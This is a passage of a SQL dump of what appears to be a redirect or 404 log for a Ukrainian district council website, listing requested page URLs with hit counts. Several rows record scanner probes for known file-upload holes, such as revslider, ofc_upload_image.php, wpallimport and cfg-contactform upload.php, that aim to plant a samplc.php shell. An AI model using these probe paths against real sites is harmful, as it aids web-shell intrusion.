00:00:00',301),(19256,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/293-pro-zamishhennja-deputata-rajonnoi-radi','','','',4,0,'2015-11-21 19:35:19','0000-00-00 00:00:00',301),(19257,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/118-pro-pogodzhennja-proektiv-vstanovlennja-mezh','','','',4,0,'2015-11-21 19:35:29','0000-00-00 00:00:00',301),(19258,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/118-pro-pogodzhennja-proektiv-vstanovlennja-mezh?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-21 19:35:31','0000-00-00 00:00:00',301),(19259,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/119-pro-zatverdzhennja-rajonnogo-bjudzhetu-na-2012-rik','','','',6,0,'2015-11-21 19:35:32','0000-00-00 00:00:00',301),(19260,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/119-pro-zatverdzhennja-rajonnogo-bjudzhetu-na-2012-rik?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-21 19:35:34','0000-00-00 00:00:00',301),(19261,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/144-pro-hid-vikonannja-rajonnoi-cilovoi-programi_2','','','',4,0,'2015-11-21 19:35:36','0000-00-00 00:00:00',301),(19262,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/204-pro-zatverdzhennja-programi-zajnjatosti-naselennja','','','',4,0,'2015-11-21 19:35:37','0000-00-00 00:00:00',301),(19263,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/204-pro-zatverdzhennja-programi-zajnjatosti-naselennja?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-21 19:35:38','0000-00-00 00:00:00',301),(19264,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/205-pro-programu-zabezpechennja-deputatskoi-dijalnosti','','','',4,0,'2015-11-21 19:35:40','0000-00-00 00:00:00',301),(19265,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/207-pro-zvit-golovi-postijnoi-komisii-rajonnoi-radi-z','','','',6,0,'2015-11-21 19:35:42','0000-00-00 00:00:00',301),(19266,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/215-pro-efektivnist-finansovoi-pidtrimki-nadanoi-z','','','',4,0,'2015-11-21 19:35:43','0000-00-00 00:00:00',301),(19267,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/225-pro-zatverdzhennja-rajonnoi-programi','','','',4,0,'2015-11-21 19:35:44','0000-00-00 00:00:00',301),(19268,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/243-pro-pogodzhennja-vvedennja-shtatnoi-odinici','','','',4,0,'2015-11-21 19:35:49','0000-00-00 00:00:00',301),(19269,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/245-pro-vstanovlennja-nadbavki-do-posadovogo-okladu','','','',4,0,'2015-11-21 19:35:52','0000-00-00 00:00:00',301),(19270,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/377-pro-vnesennja-zmin-ta-dopovnen-do-rajonnoi_3?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-21 19:35:53','0000-00-00 00:00:00',301),(19271,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/249-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_3','','','',4,0,'2015-11-21 19:35:55','0000-00-00 00:00:00',301),(19272,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/33-pro-nadannja-dozvolu-teritorialnomu-centru?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-21 19:35:58','0000-00-00 00:00:00',301),(19273,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-?start=14','','','',4,0,'2015-11-21 19:36:03','0000-00-00 00:00:00',301),(19274,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-?start=21','','','',4,0,'2015-11-21 19:36:04','0000-00-00 00:00:00',301),(19275,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-?start=28','','','',4,0,'2015-11-21 19:36:06','0000-00-00 00:00:00',301),(19276,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-?start=35','','','',4,0,'2015-11-21 19:36:07','0000-00-00 00:00:00',301),(19277,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-?start=7','','','',4,0,'2015-11-21 19:36:09','0000-00-00 00:00:00',301),(19278,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/804-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_6','','','',7,0,'2015-11-21 19:36:12','0000-00-00 00:00:00',301),(19279,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/806-pro-hid-vikonannja-rajonnoi-programi-vidpochinku_5','','','',4,0,'2015-11-21 19:36:16','0000-00-00 00:00:00',301),(19280,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/380-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_14','','','',4,0,'2015-11-21 19:36:21','0000-00-00 00:00:00',301),(19281,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/87-pro-vnesennja-zmin-do-programi-pidtrimki-malogo','','','',4,0,'2015-11-21 19:36:24','0000-00-00 00:00:00',301),(19282,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/91-pro-zatverdzhennja-polozhennja-pro-pochesnu','','','',4,0,'2015-11-21 19:36:26','0000-00-00 00:00:00',301),(19283,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/92-pro-hid-vikonannja-cilovoi-rajonnoi-programi','','','',4,0,'2015-11-21 19:36:27','0000-00-00 00:00:00',301),(19284,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/93-pro-zatverdzhennja-cilovoi-rajonnoi-programi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-21 19:36:29','0000-00-00 00:00:00',301),(19285,'http://www.malyn-rayrada.org.ua/index.php/1037-pishov-iz-zhittya-tsvik-s-m','','','',17,0,'2015-11-21 19:36:48','0000-00-00 00:00:00',301),(19286,'http://www.malyn-rayrada.org.ua/index.php/1057-vidbulas-38-sesiya-rajonnoji-radi','','','',23,0,'2015-11-21 19:36:50','0000-00-00 00:00:00',301),(19287,'http://www.malyn-rayrada.org.ua/index.php/617-shkoli-buti?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-21 19:37:10','0000-00-00 00:00:00',301),(19288,'http://www.malyn-rayrada.org.ua/index.php/619-do-vidoma-pidpriemciv-ta-zhiteliv-kabmin-vstanoviv?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-21 19:37:13','0000-00-00 00:00:00',301),(19289,'http://www.malyn-rayrada.org.ua/index.php/625-cvjato-pokrovi-presvjatoi-bogorodici-u-vorsivci','','','',16,0,'2015-11-21 19:37:20','0000-00-00 00:00:00',301),(19290,'http://www.malyn-rayrada.org.ua/index.php/626-vidbulos-zasidannja-koordinacijnoi-radi-pri-golovi?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-21 19:37:23','0000-00-00 00:00:00',301),(19291,'http://www.malyn-rayrada.org.ua/index.php/628-girnichovidobuvni-pidpriemstva-oblasti-pid?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-21 19:37:26','0000-00-00 00:00:00',301),(19292,'http://www.malyn-rayrada.org.ua/index.php/652-do-vidoma-deputativ-rajonnoi-radi-z-utochnennjam','','','',11,0,'2015-11-21 19:37:45','0000-00-00 00:00:00',301),(19293,'http://www.malyn-rayrada.org.ua/index.php/670-7-grudnja-den-miscevogo-samovrjaduvannja','','','',74,0,'2015-11-21 19:37:57','0000-00-00 00:00:00',301),(19294,'http://www.malyn-rayrada.org.ua/index.php/701-vidbulas-viizna-koordinacijna-rada-v-ljubovichah','','','',9,0,'2015-11-21 19:38:17','0000-00-00 00:00:00',301),(19295,'http://www.malyn-rayrada.org.ua/index.php/706-do-vidoma-deputativ-miscevih-rad','','','',29,0,'2015-11-21 19:38:21','0000-00-00 00:00:00',301),(19296,'http://www.malyn-rayrada.org.ua/index.php/718-vidbulas-pozachergova-sesija-malinskoi-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-21 19:38:34','0000-00-00 00:00:00',301),(19297,'http://www.malyn-rayrada.org.ua/index.php/719-vidminnosti-norm-konstitucij-u-redakcii-1996-i?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-21 19:38:37','0000-00-00 00:00:00',301),(19298,'http://www.malyn-rayrada.org.ua/index.php/720-do-vidoma-pensioneriv?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-21 19:38:40','0000-00-00 00:00:00',301),(19299,'http://www.malyn-rayrada.org.ua/index.php/721-verhovna-rada-zatverdila-sklad-kabinetu-ministriv?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-21 19:38:41','0000-00-00 00:00:00',301),(19300,'http://www.malyn-rayrada.org.ua/index.php/821-vidbuvsja-viiznij-seminar','','','',28,0,'2015-11-21 19:39:30','0000-00-00 00:00:00',301),(19301,'http://www.malyn-rayrada.org.ua/index.php/83-deputati-radilis-shhodo-situacii-v-kp-trs-polissja?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-21 19:39:35','0000-00-00 00:00:00',301),(19302,'http://www.malyn-rayrada.org.ua/index.php/832-vidbulas-31-sesija-malinskoi-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-21 19:39:38','0000-00-00 00:00:00',301),(19303,'http://www.malyn-rayrada.org.ua/index.php/967-vidbulas-36-sesiya-rajonnoji-radi','','','',13,0,'2015-11-21 19:40:23','0000-00-00 00:00:00',301),(19304,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/734-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_18','','','',14,0,'2015-11-21 19:42:37','0000-00-00 00:00:00',301),(19305,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/742-pro-znjattja-z-kontrolju-rishen-rajonnoi-radi_4','','','',25,0,'2015-11-21 19:42:48','0000-00-00 00:00:00',301),(19306,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/744-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_25','','','',15,0,'2015-11-21 19:42:58','0000-00-00 00:00:00',301),(19307,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/762-pro-peredachu-avtomobilja-gaz-3110','','','',55,0,'2015-11-21 19:43:05','0000-00-00 00:00:00',301),(19308,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/108-pro-hid-vikonannja-rajonnoi-programi-ohoroni','','','',8,0,'2015-11-21 19:44:53','0000-00-00 00:00:00',301),(19309,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/115-pro-ugodu-mizh-rajonnoju-ta-silskimi-selishhnimi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-21 19:45:45','0000-00-00 00:00:00',301),(19310,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/163-pro-normativnu-groshovu-ocinku-zemel-naselenih?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-21 19:46:42','0000-00-00 00:00:00',301),(19311,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/165-pro-hid-vikonannja-rajonnoi-cilovoi-programi_3','','','',22,0,'2015-11-21 19:47:12','0000-00-00 00:00:00',301),(19312,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/166-pro-hid-vikonannja-rajonnoi-programi-vidpochinku_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-21 19:47:22','0000-00-00 00:00:00',301),(19313,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/292-pro-zatverdzhennja-regionalnoi-programi-rozvitku?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-21 19:48:40','0000-00-00 00:00:00',301),(19314,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/293-pro-zamishhennja-deputata-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-21 19:48:53','0000-00-00 00:00:00',301),(19315,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/296-pro-vnesennja-zmin-do-programi-socialno','','','',12,0,'2015-11-21 19:49:06','0000-00-00 00:00:00',301),(19316,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/561-pro-znjattja-z-kontrolju-rishen-rajonnoi-radi_3','','','',4,0,'2015-11-21 19:51:37','0000-00-00 00:00:00',301),(19317,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/57-pro-vikonannja-planu-roboti-rajonnoi-radi-za-2011','','','',11,0,'2015-11-21 19:53:13','0000-00-00 00:00:00',301),(19318,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/154-pro-hid-vikonannja-rajonnoi-kompleksnoi-programi_2','','','',11,0,'2015-11-21 19:54:56','0000-00-00 00:00:00',301),(19319,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/618-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_13','','','',10,0,'2015-11-21 19:58:59','0000-00-00 00:00:00',301),(19320,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/460-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_11','','','',20,0,'2015-11-21 20:10:17','0000-00-00 00:00:00',301),(19321,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=430:14-&lang=uk&option=com_content&view=article','','','',3,0,'2015-11-21 21:16:22','0000-00-00 00:00:00',301),(19323,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=683:------------------------2012-&catid=42:--16052012-&Itemid=80&lang=uk','','','',10,0,'2015-11-22 00:26:49','0000-00-00 00:00:00',301),(19324,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=828:-q-q&lang=ru&option=com_content&view=article','','','',4,0,'2015-11-22 04:33:53','0000-00-00 00:00:00',301),(19325,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=546:-l-r-&Itemid=76&lang=uk&option=com_content&view=article','','','',3,0,'2015-11-22 05:41:04','0000-00-00 00:00:00',301),(19326,'http://www.malyn-rayrada.org.ua/index.php?id=45&Itemid=84&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2015-11-22 05:52:35','0000-00-00 00:00:00',301),(19327,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=565:2012-02-03-09-48-29&catid=39:-22022012-&Itemid=76&lang=en','','','',2,0,'2015-11-22 07:21:36','0000-00-00 00:00:00',301),(19328,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=912:2013-01-22-14-14-06&lang=ru&option=com_content&view=article','','','',1,0,'2015-11-22 07:36:36','0000-00-00 00:00:00',301),(19329,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/417-pro-peredachu-materialnih-cinnostej_2','','','',7,0,'2015-11-22 07:41:30','0000-00-00 00:00:00',301),(19330,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/457-pro-vnesennja-zmin-do-programi-zajnjatosti_2','','','',11,0,'2015-11-22 07:49:45','0000-00-00 00:00:00',301),(19331,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/675-pro-vnesennja-zmin-do-rajonnoi-programi_4','','','',13,0,'2015-11-22 07:50:16','0000-00-00 00:00:00',301),(19332,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/279-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_7','','','',60,0,'2015-11-22 07:50:19','0000-00-00 00:00:00',301),(19333,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=116:-2010-16-2009-&Itemid=16&lang=uk&option=com_content&view=article','','','',28,0,'2015-11-22 07:50:22','0000-00-00 00:00:00',301),(19334,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=166:-6-&catid=5:2010-06-05-12-51-34&Itemid=6&lang=uk','','','',1,0,'2015-11-22 07:50:34','0000-00-00 00:00:00',301),(19335,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=481:-2012-2015-&Itemid=73&lang=ru&option=com_content&view=article','','','',26,0,'2015-11-22 08:05:21','0000-00-00 00:00:00',301),(19337,'http://www.malyn-rayrada.org.ua/index.php/218-informacija-pro-dijalnist-likarnjanoi-kasi-u','','','',9,0,'2015-11-22 09:48:29','0000-00-00 00:00:00',301),(19338,'http://www.malyn-rayrada.org.ua/index.php?catid=13:2010-06-06-03-57-58&id=13:2010-06-06-04-07-00&Itemid=33&lang=ru&option=com_content&view=article','','','',3,0,'2015-11-22 11:32:36','0000-00-00 00:00:00',301),(19339,'http://www.malyn-rayrada.org.ua/index.php?id=59&Itemid=107&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2015-11-22 11:36:34','0000-00-00 00:00:00',301),(19340,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=981:2013-04-03-07-23-01&lang=uk&option=com_content&view=article','','','',6,0,'2015-11-22 12:15:26','0000-00-00 00:00:00',301),(19341,'http://malyn-rayrada.org.ua/wp-content/uploads/samplc.php','','','',2,0,'2015-11-22 12:16:06','0000-00-00 00:00:00',301),(19342,'http://malyn-rayrada.org.ua/samplc.php','','','',1,0,'2015-11-22 12:16:07','0000-00-00 00:00:00',301),(19343,'http://malyn-rayrada.org.ua/wp-content/plugins/revslider/temp/update_extract/samplc.php','','','',1,0,'2015-11-22 12:16:09','0000-00-00 00:00:00',301),(19344,'http://malyn-rayrada.org.ua/php-ofc-library/ofc_upload_image.php?name=sample.php','','http://malyn-rayrada.org.ua/php-ofc-library/ofc_upload_image.php?name=sample.php','',1,0,'2015-11-22 12:16:10','0000-00-00 00:00:00',301),(19345,'http://malyn-rayrada.org.ua/tmp-upload-images/samplc.php','','','',1,0,'2015-11-22 12:16:13','0000-00-00 00:00:00',301),(19346,'http://malyn-rayrada.org.ua/components/com_creativecontactform/fileupload/files/samplc.php','','','',1,0,'2015-11-22 12:16:15','0000-00-00 00:00:00',301),(19347,'http://malyn-rayrada.org.ua/wp-admin/admin-ajax.php?page=pmxi-admin-settings&action=upload&name=samplc.php','','http://malyn-rayrada.org.ua/wp-admin/admin-ajax.php?page=pmxi-admin-settings&action=upload&name=samplc.php','',1,0,'2015-11-22 12:16:19','0000-00-00 00:00:00',301),(19348,'http://malyn-rayrada.org.ua/wp-content/plugins/wpallimport/samplc.php','','','',1,0,'2015-11-22 12:16:20','0000-00-00 00:00:00',301),(19349,'http://malyn-rayrada.org.ua/server/php/files/samplc.php','','','',1,0,'2015-11-22 12:16:22','0000-00-00 00:00:00',301),(19350,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=475:2011-11-22-07-58-34&catid=38:--19122011-&Itemid=73&lang=ru','','','',2,0,'2015-11-22 14:59:08','0000-00-00 00:00:00',301),(19351,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=201:--------l-r--2011--&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-22 15:32:16','0000-00-00 00:00:00',301),(19352,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru&sa=U&ved=0ahUKEwihib6-9KPJAhWM6yYKHYjjAmA4kAMQFgiqATAk&usg=AFQjCNFS7TMxtJMX_SBkv6lF-n9lFbTriw//images/stor','','','',1,0,'2015-11-22 15:33:03','0000-00-00 00:00:00',301),(19353,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru&sa=U&ved=0ahUKEwjd5Zq_9KPJAhVI2SYKHVx_Ddw4kAMQFgiqATAk&usg=AFQjCNFS7TMxtJMX_SBkv6lF-n9lFbTriw//images/stor','','','',1,0,'2015-11-22 15:50:01','0000-00-00 00:00:00',301),(19354,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru&sa=U&ved=0ahUKEwj6w_K_9KPJAhXEQiYKHVpbB3w4kAMQFgiqATAk&usg=AFQjCNFS7TMxtJMX_SBkv6lF-n9lFbTriw//images/stor','','','',1,0,'2015-11-22 16:03:22','0000-00-00 00:00:00',301),(19355,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru&sa=U&ved=0ahUKEwjJ-O7A9KPJAhWIWSYKHWUZDf84kAMQFgiqATAk&usg=AFQjCNFS7TMxtJMX_SBkv6lF-n9lFbTriw//images/stor','','','',1,0,'2015-11-22 16:16:51','0000-00-00 00:00:00',301),(19356,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru&sa=U&ved=0ahUKEwiG0crB9KPJAhXHOiYKHTyXDKo4kAMQFgiqATAk&usg=AFQjCNFS7TMxtJMX_SBkv6lF-n9lFbTriw//images/stor','','','',1,0,'2015-11-22 16:30:15','0000-00-00 00:00:00',301),(19357,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru&sa=U&ved=0ahUKEwim2MvC9KPJAhVI7SYKHdu_Db84kAMQFgisATAk&usg=AFQjCNFS7TMxtJMX_SBkv6lF-n9lFbTriw//images/stor','','','',1,0,'2015-11-22 16:44:04','0000-00-00 00:00:00',301),(19358,'http://www.malyn-rayrada.org.ua/index.php?Itemid=62&id=31:-25032011&lang=en&layout=blog&option=com_content&view=category','','','',1,0,'2015-11-22 16:47:23','0000-00-00 00:00:00',301),(19360,'http://www.malyn-rayrada.org.ua/cfg-contactform-1/inc/upload.php','','','',5,0,'2015-11-22 22:52:03','0000-00-00 00:00:00',301),(19361,'http://www.malyn-rayrada.org.ua/cfg-contactform-2/inc/upload.php','','','',5,0,'2015-11-22 22:52:03','0000-00-00 00:00:00',301),(19362,'http://www.malyn-rayrada.org.ua/cfg-contactform-3/inc/upload.php','','','',5,0,'2015-11-22 22:52:03','0000-00-00 00:00:00',301),(19363,'http://www.malyn-rayrada.org.ua/cfg-contactform-4/inc/upload.php','','','',5,0,'2015-11-22 22:52:04','0000-00-00 00:00:00',301),(19364,'http://www.malyn-rayrada.org.ua/cfg-contactform-5/inc/upload.php','','','',5,0,'2015-11-22 22:52:04','0000-00-00 00:00:00',301),(19365,'http://www.malyn-rayrada.org.ua/cfg-contactform-6/inc/upload.php','','','',5,0,'2015-11-22 22:52:04','0000-00-00 00:00:00',301),(19366,'http://www.malyn-rayrada.org.ua/cfg-contactform-7/inc/upload.php','','','',5,0,'2015-11-22 22:52:05','0000-00-00 00:00:00',301),(19367,'http://www.malyn-rayrada.org.ua/cfg-contactform-8/inc/upload.php','','','',5,0,'2015-11-22 22:52:05','0000-00-00 00:00:00',301),(19368,'http://www.malyn-rayrada.org.ua/cfg-contactform-9/inc/upload.php','','','',5,0,'2015-11-22 22:52:06','0000-00-00 00:00:00',301),(19369,'http://www.malyn-rayrada.org.ua/cfg-contactform-10/inc/upload.php','','','',5,0,'2015-11-22 22:52:06','0000-00-00 00:00:00',301),(19370,'http://www.malyn-rayrada.org.ua/cfg-contactform-11/inc/upload.php','','','',5,0,'2015-11-22 22:52:07','0000-00-00 00:00:00',301),(19371,'http://www.malyn-rayrada.org.ua/cfg-contactform-12/inc/upload.php','','','',5,0,'2015-11-22 22:52:07','0000-00-00 00:00:00',301),(19372,'http://www.malyn-rayrada.org.ua/cfg-contactform-13/inc/upload.php','','','',5,0,'2015-11-22 22:52:07','0000-00-00 00:00:00',301),(19373,'http://www.malyn-rayrada.org.ua/cfg-contactform-14/inc/upload.php','','','',5,0,'2015-11-22 22:52:09','0000-00-00 00:00:00',301),(19374,'http://www.malyn-rayrada.org.ua/cfg-contactform-15/inc/upload.php','','','',5,0,'2015-11-22 22:52:09','0000-00-00 00:00:00',301),(19375,'http://www.malyn-rayrada.org.ua/cfg-contactform-16/inc/upload.php','','','',5,0,'2015-11-22 22:52:09','0000-00-00 00:00:00',301),(19376,'http://www.malyn-rayrada.org.ua/cfg-contactform-17/inc/upload.php','','','',5,0,'2015-11-22 22:52:10','0000-00-00 00:00:00',301),(19377,'http://www.malyn-rayrada.org.ua/cfg-contactform-18/inc/upload.php','','','',5,0,'2015-11-22 22:52:10','0000-00-00 00:00:00',301),(19378,'http://www.malyn-rayrada.org.ua/cfg-contactform-19/inc/upload.php','','','',5,0,'2015-11-22 22:52:10','0000-00-00 00:00:00',301),(19379,'http://www.malyn-rayrada.org.ua/cfg-contactform-20/inc/upload.php','','','',5,0,'2015-11-22 22:52:11','0000-00-00 00:00:00',301),(19380,'http://www.malyn-rayrada.org.ua/components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1','','','',5,0,'2015-11-22 22:52:13','0000-00-00 00:00:00',301),(19381,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=252:2011-03-01-06-16-25&catid=11&Itemid=14&lang=uk','','','',10,0,'2015-11-23 00:14:13','0000-00-00 00:00:00',301),(19382,'http://www.malyn-rayrada.org.ua/index.php?Itemid=68&catid=34&id=350:-----l---28r----&lang=uk&option=com_content&view=article','','','',3,0,'2015-11-23 02:21:46','0000-00-00 00:00:00',301),(19383,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=609:-q-q&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2015-11-23 02:34:52','0000-00-00 00:00:00',301),(19384,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=598:2012-02-29-14-13-44&catid=11&Itemid=14&lang=uk','','','',1,0,'2015-11-23 02:36:14','0000-00-00 00:00:00',301),(19385,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=218:2010-12-21-06-45-54&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',1,0,'2015-11-23 02:42:37','0000-00-00 00:00:00',301),(19386,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/749-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_19','','','',21,0,'2015-11-23 02:53:06','0000-00-00 00:00:00',301),(19387,'http://www.malyn-rayrada.org.ua/index.php/--20062014-/823-pro-pripinennja-kontraktu-z-kerivnikom-kp','','','',9,0,'2015-11-23 02:54:55','0000-00-00 00:00:00',301),(19388,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02/59-rishennja-radi/rishennja/-22022012-?lang=en&start=10','','','',1,0,'2015-11-23 02:59:30','0000-00-00 00:00:00',301),(19389,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=36&Itemid=70&lang=en&limitstart=20','','','',2,0,'2015-11-23 03:03:35','0000-00-00 00:00:00',301),(19390,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=49:--12042013-&layout=blog&Itemid=3&lang=ru','','','',1,0,'2015-11-23 03:08:35','0000-00-00 00:00:00',301),(19391,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=36:2011-07-21-07-51-53&layout=blog&Itemid=70&lang=en&limitstart=10','','','',1,0,'2015-11-23 03:12:41','0000-00-00 00:00:00',301),(19392,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=633:-2015-&catid=42&Itemid=80&lang=uk','','','',8,0,'2015-11-23 03:28:39','0000-00-00 00:00:00',301),(19393,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=ru&start=35','','','',3,0,'2015-11-23 03:42:46','0000-00-00 00:00:00',301),(19394,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=582:2012-02-27-13-18-37&catid=40:--28032012-&Itemid=77&lang=uk','','','',1,0,'2015-11-23 03:51:53','0000-00-00 00:00:00',301),(19395,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=247:---500------lr&catid=11&Itemid=14&lang=uk','','','',1,0,'2015-11-23 03:58:16','0000-00-00 00:00:00',301),(19396,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=45&layout=blog&Itemid=84&lang=uk','','','',2,0,'2015-11-23 04:01:54','0000-00-00 00:00:00',301),(19397,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/275-pro-zatverdzhennja-novogo-skladu-komisii-rajonnoi_2','','','',22,0,'2015-11-23 04:04:38','0000-00-00 